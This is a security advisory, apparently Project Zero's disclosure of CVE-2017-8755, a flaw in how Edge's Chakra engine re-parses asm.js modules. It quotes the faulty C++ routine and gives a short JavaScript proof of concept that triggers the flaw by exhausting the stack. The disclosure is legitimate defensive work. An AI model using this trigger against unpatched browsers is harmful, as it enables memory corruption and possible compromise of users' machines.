Microsoft Edge Chakra JavascriptFunction::ReparseAsmJsModule Parsing Issue

2017-09-22T00:00:00
ID PACKETSTORM:144300
Type packetstorm
Reporter Google Security Research
Modified 2017-09-22T00:00:00

Description

                                        
                                            `Microsoft Edge: Chakra: JavascriptFunction::ReparseAsmJsModule incorrectly re-parses   
  
CVE-2017-8755  
  
  
This is similar to the <a href="/p/project-zero/issues/detail?id=1271" title="Microsoft Edge: Chakra: InterpreterStackFrame::ProcessLinkFailedAsmJsModule incorrectly re-parses" class="closed_ref" rel="nofollow"> issue 1271 </a>.  
  
Here's the method used to re-parse asmjs modules.  
void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)  
{  
ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();  
Assert(functionInfo);  
functionInfo->GetFunctionBody()->AddDeferParseAttribute();  
functionInfo->GetFunctionBody()->ResetEntryPoint();  
functionInfo->GetFunctionBody()->ResetInParams();  
  
FunctionBody * funcBody = functionInfo->Parse(functionRef);  
  
#if ENABLE_PROFILE_INFO  
// This is the first call to the function, ensure dynamic profile info  
funcBody->EnsureDynamicProfileInfo();  
#endif  
  
(*functionRef)->UpdateUndeferredBody(funcBody);  
}  
  
First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception. So in the case, the function body remains reseted(invalid).  
  
We can make it throw an exception simply by exhausting the stack.   
  
PoC:  
function Module() {  
'use asm';  
  
function f() {  
}  
  
return f;  
}  
  
function recur() {  
try {  
recur();  
} catch (e) {  
Module(1);  
}  
}  
  
recur();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`